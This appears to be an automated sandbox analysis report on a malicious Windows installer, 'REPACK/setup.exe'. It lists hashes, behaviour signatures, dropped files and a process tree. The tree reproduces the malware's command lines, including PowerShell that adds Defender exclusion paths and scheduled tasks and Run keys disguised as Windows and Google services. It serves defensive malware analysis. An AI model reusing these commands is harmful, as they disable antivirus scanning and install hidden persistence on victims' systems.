Analysis
-
max time kernel
102s -
max time network
95s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
-
submitted
26-09-2022 18:43
General
-
Target
REPACK/setup.exe
-
Size
681.1MB
-
MD5
f57c9332808a063901254cd41eef7613
-
SHA1
67df58792e9a9d3c3d00e39753873fcf6ef2ae5f
-
SHA256
2b50d8d9acaab4c8679d87d37dda1e97464e3bdbb00c942277c58d7532098a50
-
SHA512
e032ca3899a93170f8a3e2d4be32deb66f21c5de02fc9f453bfd3709c0f54ff5eb75db58777ca1565dd57632b7c125de776b69737e8554761e1e15fd3b98e0eb
-
SSDEEP
393216:zKAhcUJ09+imj7+mmFygBWbln6eqOBZC517HNohLBn5Iv/vQ:2O090j7nmFVWhn/qOB8JiaQ
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
-
Drops file in Drivers directory 1 IoCs
-
Executes dropped EXE 5 IoCs
-
Loads dropped DLL 2 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in System32 directory 2 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
-
Drops file in Program Files directory 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 9 IoCs
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
-
Suspicious use of WriteProcessMemory 28 IoCs
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\REPACK\setup.exe"C:\Users\Admin\AppData\Local\Temp\REPACK\setup.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdABrACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGIAaABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHMAaQB1ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAaABuACMAPgA="3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\UNNAMED.exe"C:\Users\Admin\AppData\Local\Temp\UNNAMED.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\UNNAMED2.exe"C:\Users\Admin\AppData\Local\Temp\UNNAMED2.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\UNNAMED3.exe"C:\Users\Admin\AppData\Local\Temp\UNNAMED3.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\UNNAMED4.exe"C:\Users\Admin\AppData\Local\Temp\UNNAMED4.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /sc minute /mo 1 /rl highest /tn Windows Security Health Service /tr "C:\Users\Admin\AppData\Roaming\Microsoft\WindowsSecurityHealthService\Windows Security Health Service.exe" /f4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Microsoft\WindowsSecurityHealthService\Windows Security Health Service.exe"C:\Users\Admin\AppData\Roaming\Microsoft\WindowsSecurityHealthService\Windows Security Health Service.exe"4⤵
- Executes dropped EXE
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe <#thakcjdi#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Google' /tr '''C:\Program Files\Google\chromeupdater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\chromeupdater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Google' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Google" /t REG_SZ /f /d 'C:\Program Files\Google\chromeupdater.exe' }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn Google /tr "'C:\Program Files\Google\chromeupdater.exe'"3⤵
- Creates scheduled task(s)
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\UNNAMED3.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\UNNAMED.exeFilesize
325KB
MD5038f548b46e0ef89dc476557407e7b4b
SHA118546d1fe05f4aee0313ff7fb805f8a51d65f145
SHA256ff953ecfb1f82e587aa25c29d980f0875c9c9e5b2c9a3e13d87e91a551be9f45
SHA5123dba1ffa622ae1c3b76f12c12e50984ddcfdae288fd234ef93784af2524b8646bdf3e95204ab57f4153779e7766d8bbb66e50e0c68e8adba752056d2655670f3
-
C:\Users\Admin\AppData\Local\Temp\UNNAMED2.exeFilesize
7.5MB
MD5f49731a7439fd1c0bd9b1ca479372985
SHA126c9aec52acacb8c2573577b721ed1cb74cfdb30
SHA2563b6661895ec7cf5f8275093791322e6c05f28583a49ffc88e0e28fe6b1450972
SHA5128887062cd5505a5073f2b819d08041c0151c054955c1912bf6ff450c03f08e29c40ef0ff135546c73793a59b5e11eaabd7956b1bd3f3f94f4fbc30ab0b73816a
-
C:\Users\Admin\AppData\Local\Temp\UNNAMED3.exeFilesize
9.1MB
MD5223ce6bb95cc6072b3c08cdcdf6b2944
SHA1a55afd57e0862347574680bda2ea42ccb6c31bce
SHA25639cc2423c2cd157014637802833c3b70f9b6cc5ff3e3247b15949eded3cb8d62
SHA512a34ecf9dc5dae22f37d3697a5c4050261ca98f22f3f88108c9c63f02911fe64ed1be9b8608211b8440cb19fd5dbac423d1bbe1c5e70f2e31f0043b8ebbd4daa6
-
C:\Users\Admin\AppData\Local\Temp\UNNAMED3.exeFilesize
9.1MB
MD5223ce6bb95cc6072b3c08cdcdf6b2944
SHA1a55afd57e0862347574680bda2ea42ccb6c31bce
SHA25639cc2423c2cd157014637802833c3b70f9b6cc5ff3e3247b15949eded3cb8d62
SHA512a34ecf9dc5dae22f37d3697a5c4050261ca98f22f3f88108c9c63f02911fe64ed1be9b8608211b8440cb19fd5dbac423d1bbe1c5e70f2e31f0043b8ebbd4daa6
-
C:\Users\Admin\AppData\Local\Temp\UNNAMED4.exeFilesize
68KB
MD5953f7e1cc05d1c62e733325e535dfec2
SHA1b15b41799c491f1a9dac97189fd2a7373c9a7cbe
SHA256906de8044ba266774e17f3fe0683aed2ccf60e2f73d2f78eebf38f636f0ce74e
SHA5122406f2cf52706dba8d182b061efd3cb15ce533ea8eae8abcdf318a051f46951219385d655d30bf2920513bb66a6c4b02698fd575f2cf32b7928de7d8f36b79b9
-
C:\Users\Admin\AppData\Local\Temp\UNNAMED4.exeFilesize
68KB
MD5953f7e1cc05d1c62e733325e535dfec2
SHA1b15b41799c491f1a9dac97189fd2a7373c9a7cbe
SHA256906de8044ba266774e17f3fe0683aed2ccf60e2f73d2f78eebf38f636f0ce74e
SHA5122406f2cf52706dba8d182b061efd3cb15ce533ea8eae8abcdf318a051f46951219385d655d30bf2920513bb66a6c4b02698fd575f2cf32b7928de7d8f36b79b9
-
C:\Users\Admin\AppData\Roaming\Microsoft\WindowsSecurityHealthService\Windows Security Health Service.exeFilesize
68KB
MD5953f7e1cc05d1c62e733325e535dfec2
SHA1b15b41799c491f1a9dac97189fd2a7373c9a7cbe
SHA256906de8044ba266774e17f3fe0683aed2ccf60e2f73d2f78eebf38f636f0ce74e
SHA5122406f2cf52706dba8d182b061efd3cb15ce533ea8eae8abcdf318a051f46951219385d655d30bf2920513bb66a6c4b02698fd575f2cf32b7928de7d8f36b79b9
-
C:\Users\Admin\AppData\Roaming\Microsoft\WindowsSecurityHealthService\Windows Security Health Service.exeFilesize
68KB
MD5953f7e1cc05d1c62e733325e535dfec2
SHA1b15b41799c491f1a9dac97189fd2a7373c9a7cbe
SHA256906de8044ba266774e17f3fe0683aed2ccf60e2f73d2f78eebf38f636f0ce74e
SHA5122406f2cf52706dba8d182b061efd3cb15ce533ea8eae8abcdf318a051f46951219385d655d30bf2920513bb66a6c4b02698fd575f2cf32b7928de7d8f36b79b9
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD5f5eb2781f9f08a33a055f4f09554050d
SHA17dc7fdc8310d34747ef35ef228ef076bd9848cea
SHA256c3270e71c364e80f43692befd36615905db29942ad877e173289bbe770ed751f
SHA512bf0eaf2c0e322ddd26b2deda63c26c332560bc8ca126f0cadbb3acd80ef5fe22dc1a08ed87034e47344b2e9a7cfde1c15276c0a978d50d9fe37626e37408a55f
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD5f5eb2781f9f08a33a055f4f09554050d
SHA17dc7fdc8310d34747ef35ef228ef076bd9848cea
SHA256c3270e71c364e80f43692befd36615905db29942ad877e173289bbe770ed751f
SHA512bf0eaf2c0e322ddd26b2deda63c26c332560bc8ca126f0cadbb3acd80ef5fe22dc1a08ed87034e47344b2e9a7cfde1c15276c0a978d50d9fe37626e37408a55f
-
\??\PIPE\srvsvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\Users\Admin\AppData\Local\Temp\UNNAMED2.exeFilesize
7.5MB
MD5f49731a7439fd1c0bd9b1ca479372985
SHA126c9aec52acacb8c2573577b721ed1cb74cfdb30
SHA2563b6661895ec7cf5f8275093791322e6c05f28583a49ffc88e0e28fe6b1450972
SHA5128887062cd5505a5073f2b819d08041c0151c054955c1912bf6ff450c03f08e29c40ef0ff135546c73793a59b5e11eaabd7956b1bd3f3f94f4fbc30ab0b73816a
-
\Users\Admin\AppData\Local\Temp\UNNAMED3.exeFilesize
9.1MB
MD5223ce6bb95cc6072b3c08cdcdf6b2944
SHA1a55afd57e0862347574680bda2ea42ccb6c31bce
SHA25639cc2423c2cd157014637802833c3b70f9b6cc5ff3e3247b15949eded3cb8d62
SHA512a34ecf9dc5dae22f37d3697a5c4050261ca98f22f3f88108c9c63f02911fe64ed1be9b8608211b8440cb19fd5dbac423d1bbe1c5e70f2e31f0043b8ebbd4daa6
-
memory/268-99-0x000007FEED870000-0x000007FEEE293000-memory.dmpFilesize
10.1MB
-
memory/268-100-0x000007FEECD10000-0x000007FEED86D000-memory.dmpFilesize
11.4MB
-
memory/268-104-0x0000000002284000-0x0000000002287000-memory.dmpFilesize
12KB
-
memory/268-105-0x000000000228B000-0x00000000022AA000-memory.dmpFilesize
124KB
-
memory/268-101-0x0000000002284000-0x0000000002287000-memory.dmpFilesize
12KB
-
memory/268-102-0x000000000228B000-0x00000000022AA000-memory.dmpFilesize
124KB
-
memory/544-103-0x0000000000000000-mapping.dmp
-
memory/1008-76-0x0000000000000000-mapping.dmp
-
memory/1144-106-0x0000000000000000-mapping.dmp
-
memory/1172-60-0x0000000000000000-mapping.dmp
-
memory/1504-55-0x000007FEFC141000-0x000007FEFC143000-memory.dmpFilesize
8KB
-
memory/1504-54-0x0000000000E20000-0x0000000001F26000-memory.dmpFilesize
17.0MB
-
memory/1540-95-0x000000000277B000-0x000000000279A000-memory.dmpFilesize
124KB
-
memory/1540-92-0x000007FEEC860000-0x000007FEED3BD000-memory.dmpFilesize
11.4MB
-
memory/1540-94-0x0000000002774000-0x0000000002777000-memory.dmpFilesize
12KB
-
memory/1540-93-0x0000000002774000-0x0000000002777000-memory.dmpFilesize
12KB
-
memory/1540-91-0x000007FEEE750000-0x000007FEEF173000-memory.dmpFilesize
10.1MB
-
memory/1672-70-0x0000000000000000-mapping.dmp
-
memory/1672-74-0x00000000003D0000-0x00000000003E0000-memory.dmpFilesize
64KB
-
memory/1672-73-0x0000000000820000-0x0000000000838000-memory.dmpFilesize
96KB
-
memory/1704-67-0x0000000000000000-mapping.dmp
-
memory/1704-77-0x000000013F590000-0x000000014056C000-memory.dmpFilesize
15.9MB
-
memory/1704-107-0x000000013F590000-0x000000014056C000-memory.dmpFilesize
15.9MB
-
memory/1704-78-0x000000013F590000-0x000000014056C000-memory.dmpFilesize
15.9MB
-
memory/1704-88-0x000000013F590000-0x000000014056C000-memory.dmpFilesize
15.9MB
-
memory/1728-83-0x00000000011E0000-0x00000000011F8000-memory.dmpFilesize
96KB
-
memory/1728-79-0x0000000000000000-mapping.dmp
-
memory/1744-85-0x00000000028DB000-0x00000000028FA000-memory.dmpFilesize
124KB
-
memory/1744-86-0x00000000028D4000-0x00000000028D7000-memory.dmpFilesize
12KB
-
memory/1744-59-0x000007FEECD10000-0x000007FEED86D000-memory.dmpFilesize
11.4MB
-
memory/1744-65-0x00000000028D4000-0x00000000028D7000-memory.dmpFilesize
12KB
-
memory/1744-58-0x000007FEED870000-0x000007FEEE293000-memory.dmpFilesize
10.1MB
-
memory/1744-56-0x0000000000000000-mapping.dmp
-
memory/1744-87-0x00000000028DB000-0x00000000028FA000-memory.dmpFilesize
124KB
-
memory/1956-63-0x0000000000000000-mapping.dmp